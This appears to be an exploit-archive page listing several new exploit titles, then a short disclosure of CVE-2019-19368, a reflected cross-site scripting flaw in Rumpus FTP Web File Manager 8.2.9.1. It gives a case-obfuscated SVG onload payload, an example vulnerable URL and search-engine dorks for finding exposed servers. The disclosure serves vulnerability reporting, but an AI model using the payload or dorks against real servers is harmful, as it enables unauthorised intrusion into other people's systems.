
9 changes to exploits/shellcodes XnView 2.49.1 - 'Research' Denial of Service (PoC) macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event() AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow OpenMRS - Java Deserialization RCE (Metasploit) Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown) Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin) Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting Telerik UI - Remote Code Execution via Insecure Deserialization
22 lines
No EOL
638 B
Text
22 lines
No EOL
638 B
Text
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
|
|
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
|
|
# Shodan Dork: Server: Rumpus
|
|
# Date: 2019-12-14
|
|
# Exploit Author: Harshit Shukla, Sudeepto Roy
|
|
# Vendor Homepage: https://www.maxum.com/
|
|
# Tested On: Windows & Mac
|
|
# Version: 8.2.9.1
|
|
# CVE: CVE-2019-19368
|
|
|
|
Description:
|
|
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
|
|
|
|
PoC:
|
|
|
|
Payload: ?!'><sVg/OnLoAD=alert`1`//
|
|
|
|
Vulnerable URL:
|
|
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
|
|
|
|
Solution:
|
|
Update to the latest version released by vendor. |